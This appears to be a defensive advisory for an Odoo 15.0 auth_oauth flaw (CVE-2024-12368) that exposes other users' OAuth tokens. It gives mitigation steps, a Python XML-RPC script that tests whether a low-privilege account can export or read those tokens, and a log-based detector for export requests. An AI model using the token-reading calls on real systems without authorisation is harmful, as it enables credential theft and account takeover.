CVE-2024-12368

8.1 HIGH

📋 TL;DR

An improper access control vulnerability in Odoo's auth_oauth module allows internal users to export OAuth tokens belonging to other users. This affects Odoo Community 15.0 and Odoo Enterprise 15.0 installations. Attackers could use stolen tokens to impersonate users and access external services.

💻 Affected Systems

Products:
  • Odoo Community
  • Odoo Enterprise
Versions: 15.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes, once the auth_oauth module is installed and an OAuth provider is enabled
Notes: Only affects installations with OAuth authentication enabled. Requires the login of an internal user (not a portal or public user).

📦 What is this software?

Odoo is an open-source suite of business applications (ERP, CRM, accounting, inventory, e-commerce and more) distributed as a Community edition and a commercial Enterprise edition. The auth_oauth module adds OAuth2 single sign-on for Odoo users (for example Google or Microsoft accounts) and stores each user's provider-issued access token on their res.users record.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker gains access to all user OAuth tokens, enabling impersonation across the connected services (within the scopes Odoo requested and the provider's token lifetime), data exfiltration, and account takeover in external systems. Note that auth_oauth also accepts a user's stored OAuth access token in place of their password when checking credentials, so a harvested token can be used to log in to Odoo itself as the victim until the victim's next OAuth sign-in replaces it.

🟠 Likely Case

An internal user with malicious intent exports the tokens of specific targets to gain unauthorized access to their external accounts and services.

🟢 If Mitigated

Limited impact with proper access controls and monitoring, though any token exposure still represents a credential leak, and affected tokens should be treated as compromised.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ❌ No
Complexity: MEDIUM

Exploitation requires valid credentials for an internal user. No special tooling is needed: the flaw is reached through the normal record-export functionality available to logged-in users (the web client's export dialog and the equivalent RPC calls), targeting the OAuth token field that auth_oauth adds to user records.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Odoo 15.0 builds that include the auth_oauth fix. The 15.0 stable branch is rolling (the version string stays "15.0"), so check the build or commit date rather than the version number.

Vendor Advisory: https://github.com/odoo/odoo/issues/193854

Restart Required: Yes. Odoo serves its Python code from memory, so the server process must be restarted after the code is updated; if the fix also changes data files (access rules, views), update the module as well (`odoo-bin -d <database> -u auth_oauth`).

Instructions:

1. Update the Odoo 15.0 code base (source checkout or distribution package) to a build that includes the auth_oauth fix.
2. Restart the Odoo server and, if the fix touched data files, update the module with `-u auth_oauth`.
3. Confirm, logged in as a non-admin internal user, that the `oauth_access_token` field of res.users can no longer be exported or read for other users.

🔧 Temporary Workarounds

Disable OAuth token export functionality (Platforms: all)

Temporarily remove or restrict the export feature for OAuth tokens in the auth_oauth module. The sensitive data is the `oauth_access_token` field on res.users; one option is restricting that field to administrators (a `groups` attribute on the field, set from a small custom module), another is overriding export on res.users to drop the column for non-admin users. Whichever you choose, confirm afterwards that a non-admin internal user can neither export nor read the field for other users.

Restrict internal user permissions (Platforms: all)

Review Odoo user groups and permissions, and limit which internal users hold user-administration or data-export rights. Odoo 15's export feature is gated by the "Allow the export feature" group (`base.group_allow_export`); removing it from users who do not need exports reduces the attack surface, but does not by itself prevent direct reads of the field through RPC.

🧯 If You Can't Patch

  • Implement strict access controls and monitor user activity for token export attempts, exports of res.users in particular
  • Consider disabling OAuth authentication temporarily if feasible; disabling sign-in does not remove tokens already stored in `oauth_access_token`, so clear that field for all users as well (a fresh value is stored again at the next OAuth sign-in once it is re-enabled)

🔍 How to Verify

Check if Vulnerable:

Confirm that the instance runs Odoo 15.0 and that the auth_oauth module is installed (its record in `ir.module.module` has state `installed`). Then, logged in as an ordinary internal user rather than an administrator, try to export or read the `oauth_access_token` field that auth_oauth adds to `res.users` for users other than yourself, either through the web client's export dialog or through the equivalent RPC calls (`export_data`, `search_read`). Non-empty token values coming back for other users means the instance is vulnerable; choose targets that have actually signed in through OAuth, since the field is empty otherwise.

Check Version:

`odoo-bin --version` from a source checkout, `odoo --version` for packaged installs, or the About entry in the user menu of the web client. Because 15.0 is a rolling branch, the version string alone does not show whether the fix is present; compare the build date or the commit of the checkout against the fix.

Verify Fix Applied:

After patching, repeat the same check as a non-admin internal user: the requests should now be refused with an access error (or return no token values for other users).
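A concrete form of this check, as an added example for this advisory rather than code from the Odoo project: it logs in over Odoo's standard XML-RPC API as a low-privilege user and tries both the export path (`export_data`, which is what the export dialog ends up calling) and a plain `search_read` of `oauth_access_token` for other users, then reduces each outcome to exposed, refused or empty. The server URL, database and login are placeholder assumptions; the fault codes are the ones Odoo's XML-RPC layer uses for refused operations.

```python
"""Check whether an ordinary internal Odoo user can read or export other
users' OAuth access tokens (the CVE-2024-12368 condition).

Added example for this advisory, not code from the Odoo project. It uses
Odoo's standard XML-RPC endpoints (/xmlrpc/2/common and /xmlrpc/2/object),
the ORM methods export_data and search_read, and the res.users field that
auth_oauth adds, oauth_access_token. URL, database and login below are
placeholders.
"""
import xmlrpc.client

MODEL = "res.users"
TOKEN_FIELD = "oauth_access_token"  # added to res.users by auth_oauth

# Fault codes Odoo's XML-RPC layer assigns to refusals:
# 2 = UserError (e.g. "no right to export"), 3 = AccessDenied, 4 = AccessError.
REFUSED_FAULT_CODES = {2, 3, 4}


def classify(call):
    """Run one RPC (zero-argument callable returning a list of token values)
    and reduce the outcome to 'refused', 'exposed' or 'empty'.

    refused : the server rejected the operation (expected once patched)
    exposed : at least one non-empty token value came back (vulnerable)
    empty   : the call succeeded but no token was present; the targets may
              simply never have signed in through OAuth, so pick targets
              that have.
    """
    try:
        values = call()
    except xmlrpc.client.Fault as fault:
        if fault.faultCode in REFUSED_FAULT_CODES or "AccessError" in fault.faultString:
            return "refused"
        raise  # anything else is a real error worth seeing
    return "exposed" if any(values) else "empty"


def tokens_via_export(models, db, uid, pwd, victim_ids):
    """export_data is what the web client's Export dialog ends up calling;
    it returns {'datas': [[col, col, ...], ...]} with '' for empty values."""
    result = models.execute_kw(db, uid, pwd, MODEL, "export_data",
                               [victim_ids, ["id", "login", TOKEN_FIELD]])
    return [row[2] for row in result["datas"]]


def tokens_via_read(models, db, uid, pwd, victim_ids):
    """Plain read of the same column, to tell an export-only hole from a
    general field-access hole (False is Odoo's value for an empty Char)."""
    rows = models.execute_kw(db, uid, pwd, MODEL, "search_read",
                             [[["id", "in", victim_ids]]],
                             {"fields": ["login", TOKEN_FIELD]})
    return [row.get(TOKEN_FIELD) for row in rows]


def check_token_exposure(models, db, uid, pwd, victim_ids):
    """Return {'export_data': ..., 'search_read': ...} outcomes."""
    return {
        "export_data": classify(lambda: tokens_via_export(models, db, uid, pwd, victim_ids)),
        "search_read": classify(lambda: tokens_via_read(models, db, uid, pwd, victim_ids)),
    }


def is_vulnerable(report):
    return any(outcome == "exposed" for outcome in report.values())


def main(url="http://localhost:8069", db="odoo", login="employee", pwd="employee"):
    # Placeholders: authenticate as a plain internal user (base.group_user),
    # not an administrator, otherwise the test proves nothing.
    common = xmlrpc.client.ServerProxy(f"{url}/xmlrpc/2/common")
    uid = common.authenticate(db, login, pwd, {})
    if not uid:
        raise SystemExit("authentication failed")
    models = xmlrpc.client.ServerProxy(f"{url}/xmlrpc/2/object")
    # A handful of *other* users; ideally ones known to sign in through OAuth.
    victims = models.execute_kw(db, uid, pwd, MODEL, "search",
                                [[["id", "!=", uid]]], {"limit": 10})
    report = check_token_exposure(models, db, uid, pwd, victims)
    print(report, "-> VULNERABLE" if is_vulnerable(report) else "-> not exposed")


if __name__ == "__main__":
    main()
```

Run it before and after patching with the same low-privilege account: `exposed` on either path means the field is readable by that user, `refused` on both is the expected post-fix result, and `empty` means the chosen targets have no stored token, so pick users who sign in via OAuth.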

📡 Detection & Monitoring

Log Indicators:

  • Export requests from ordinary internal users in the werkzeug access log: `POST /web/export/xlsx` or `/web/export/csv` (the web client's export dialog; the model and field list are in the request body, not the URL) and `POST /web/dataset/call_kw/res.users/export_data`
  • Unusual volume of export or `res.users` read requests from a single session or source address
  • Calls through `/xmlrpc/2/object` or `/jsonrpc` show neither model nor method in the URL; body-level logging at a reverse proxy, or an Odoo-side audit, is needed to see those

Network Indicators:

  • Odoo-held OAuth access tokens being presented to the identity provider's APIs from hosts other than the Odoo server, or from a client that is not the token owner's usual device

SIEM Query:

Filter the Odoo server log for `werkzeug:` lines whose request path matches `/web/export/(csv|xlsx)` or `/web/dataset/call_kw/res.users/export_data`, group by source address (and by session or user where a reverse proxy or audit module records it), and alert on any `res.users` export or on export counts above the normal baseline.
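A minimal implementation of that query over the server log, as an added example (not part of this advisory's source or of Odoo): it parses werkzeug access-log lines, counts per source address the requests that name `res.users`/`export_data` in the URL, the generic export endpoints, and the opaque RPC endpoints, and emits ranked alerts. The sample lines are constructed for illustration; the log-line shape is Odoo's default format.

```python
"""Flag export activity in an Odoo 15 server log that could indicate
someone harvesting res.users data such as oauth_access_token.

Added example for this advisory, not code from the Odoo project. The log
lines below are constructed in the shape of Odoo's default werkzeug access
log (<date> <time> <pid> <level> <db> werkzeug: <ip> - - [<date>] "<verb>
<path> HTTP/1.1" <status> - <sql_count> <sql_time> <other_time>); the
addresses, database name and timings are made up.
"""
import re
import sys
from collections import Counter

SAMPLE_LINES = [  # constructed sample input
    '2024-11-05 09:12:01,117 4211 INFO prod werkzeug: 10.0.5.23 - - [05/Nov/2024 09:12:01] "POST /web/dataset/call_kw/res.users/export_data HTTP/1.1" 200 - 9 0.014 0.061',
    '2024-11-05 09:12:03,402 4211 INFO prod werkzeug: 10.0.5.23 - - [05/Nov/2024 09:12:03] "POST /web/export/xlsx HTTP/1.1" 200 - 14 0.031 0.188',
    '2024-11-05 09:12:05,900 4211 INFO prod werkzeug: 10.0.5.23 - - [05/Nov/2024 09:12:05] "POST /xmlrpc/2/object HTTP/1.1" 200 - 6 0.009 0.040',
    '2024-11-05 09:15:44,008 4211 INFO prod werkzeug: 10.0.7.8 - - [05/Nov/2024 09:15:44] "POST /web/dataset/call_kw/sale.order/read HTTP/1.1" 200 - 3 0.004 0.020',
    '2024-11-05 09:20:10,511 4211 INFO prod werkzeug: 10.0.9.1 - - [05/Nov/2024 09:20:10] "POST /web/export/csv HTTP/1.1" 200 - 11 0.020 0.150',
    '2024-11-05 09:20:12,302 4211 INFO prod werkzeug: 10.0.9.1 - - [05/Nov/2024 09:20:12] "POST /web/export/csv HTTP/1.1" 200 - 12 0.022 0.160',
    '2024-11-05 09:20:14,777 4211 INFO prod werkzeug: 10.0.9.1 - - [05/Nov/2024 09:20:14] "POST /web/export/xlsx HTTP/1.1" 200 - 13 0.025 0.170',
    '2024-11-05 09:21:00,000 4211 INFO prod odoo.addons.base.models.ir_cron: Starting job `Mail: Email Queue Manager`.',
]

LOG_RE = re.compile(
    r'^(?P<ts>\S+ \S+) \d+ \w+ (?P<db>\S+) werkzeug: (?P<ip>\S+) - - \[[^\]]*\] '
    r'"(?P<verb>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The one path that names res.users and export_data in the URL itself.
USERS_EXPORT_RE = re.compile(r"^/web/dataset/call_kw/res\.users/export_data(?:$|[/?])")
# The web client's Export dialog: model and field list travel in the POST
# body, so the URL alone does not say what was exported.
GENERIC_EXPORT_RE = re.compile(r"^/web/export/(?:csv|xlsx)(?:$|[/?])")
# RPC endpoints whose model and method are invisible in the access log.
OPAQUE_RPC_RE = re.compile(r"^/(?:xmlrpc/2/object|jsonrpc)(?:$|[/?])")


def parse_line(line):
    """Return the werkzeug access-log fields as a dict, or None for other lines."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def detect(lines, generic_threshold=3):
    """Return (severity, ip, reason) alerts, highest severity first.

    high   : any export_data call on res.users
    medium : generic exports from one address at or above generic_threshold
    info   : opaque RPC traffic from an address that already tripped a rule
    """
    users_export, generic_export, opaque_rpc = Counter(), Counter(), Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if USERS_EXPORT_RE.match(path):
            users_export[ip] += 1
        elif GENERIC_EXPORT_RE.match(path):
            generic_export[ip] += 1
        elif OPAQUE_RPC_RE.match(path):
            opaque_rpc[ip] += 1

    alerts = []
    for ip, n in users_export.items():
        alerts.append(("high", ip, f"{n} export_data call(s) on res.users"))
    for ip, n in generic_export.items():
        if n >= generic_threshold:
            alerts.append(("medium", ip, f"{n} web exports; model not in URL, inspect request bodies"))
    suspicious = set(users_export) | {ip for ip, n in generic_export.items() if n >= generic_threshold}
    for ip, n in opaque_rpc.items():
        if ip in suspicious:
            alerts.append(("info", ip, f"{n} XML-RPC/JSON-RPC call(s); method not logged"))
    rank = {"high": 0, "medium": 1, "info": 2}
    return sorted(alerts, key=lambda a: (rank[a[0]], a[1]))


if __name__ == "__main__":
    # Usage: python detect_odoo_exports.py [/var/log/odoo/odoo-server.log]
    source = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else SAMPLE_LINES
    for severity, ip, reason in detect(source):
        print(f"[{severity}] {ip}: {reason}")
```

The address is the only actor identifier in the default log line; behind a reverse proxy it will be the proxy's address unless `proxy_mode` is enabled, and mapping a request back to an Odoo user still requires session-level logging at the proxy or an audit module, which is why the generic-export rule is only medium severity.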

🔗 References
